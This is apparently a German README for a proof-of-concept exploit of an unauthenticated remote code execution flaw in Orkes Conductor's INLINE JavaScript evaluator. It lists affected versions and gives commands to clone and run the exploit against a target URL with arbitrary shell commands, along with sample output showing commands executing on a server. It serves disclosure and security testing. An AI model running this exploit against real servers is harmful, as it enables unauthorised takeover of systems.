
CVE-2026-58138 - Conductor (3.21.21..<3.30.2) nicht authentifizierte RCE über INLINE GraalVM Evaluator
Kritische Remote-Codeausführung-Schwachstelle in Orkes Conductor
CVE-2026-58138 ist eine kritische, nicht authentifizierte Remote-Codeausführung (RCE) Schwachstelle, die Orkes Conductor Versionen 3.21.21 bis 3.30.1 betrifft. Diese Schwachstelle ermöglicht es Angreifern, ohne Authentifizierung beliebige Befehle auf dem Conductor-Server auszuführen, was potenziell zur vollständigen Kompromittierung des Systems führen kann.
Die Schwachstelle existiert im INLINE-Aufgabentyp innerhalb der Workflow-Engine von Orkes Conductor. Die INLINE-Aufgabe unterstützt die JavaScript-Auswertung mit Zugriff auf Java-Objekte über eval, was einem Angreifer Folgendes ermöglicht:
INLINE-Aufgabe mit JavaScript-Code enthältjava.lang.Runtime.exec()| Versionsbereich | Status |
|---|---|
| 3.21.21 - 3.30.1 | ✅ Anfällig |
| > 3.30.1 | ❌ Gepatched |
# Klone das Repository
git clone https://github.com/0xgh057r3c0n/CVE-2026-58138.git
cd CVE-2026-58138
# Mach das Skript ausführbar
chmod +x CVE-2026-58138.py
# Überprüfe die Installation
python3 CVE-2026-58138.py --help
# Grundlegende Nutzung
python3 CVE-2026-58138.py http://target:8080
# Benutzerdefinierter Befehl
python3 CVE-2026-58138.py http://target:8080 -c "whoami; id"
[>] Orkes Conductor 3.21.21 - 3.30.1 Remote Code Execution
[>] Author: 0xgh057r3c0n
[>] CVE-2026-58138 Unauthenticated RCE PoC
[*] target = http://192.168.1.100:8080
[*] command = 'id; hostname'
[+] workflow 'pwn_1742345678' registered (HTTP 200)
[+] started workflow id = 123e4567-e89b-12d3-a456-426614174000
[+] UNAUTHENTICATED RCE CONFIRMED – command output:
uid=1000(conductor) gid=1000(conductor) groups=1000(conductor)
conductor-server-6b7c8d9e0f-abc12
3.30.2 oder höherNur für Bildungs- und Sicherheitsforschungszwecke. Nur auf Systemen verwenden, die dir gehören oder für die du ausdrückliche Erlaubnis zum Testen hast.
⭐ Nützlich gefunden? Gib ihm einen Stern auf GitHub ⭐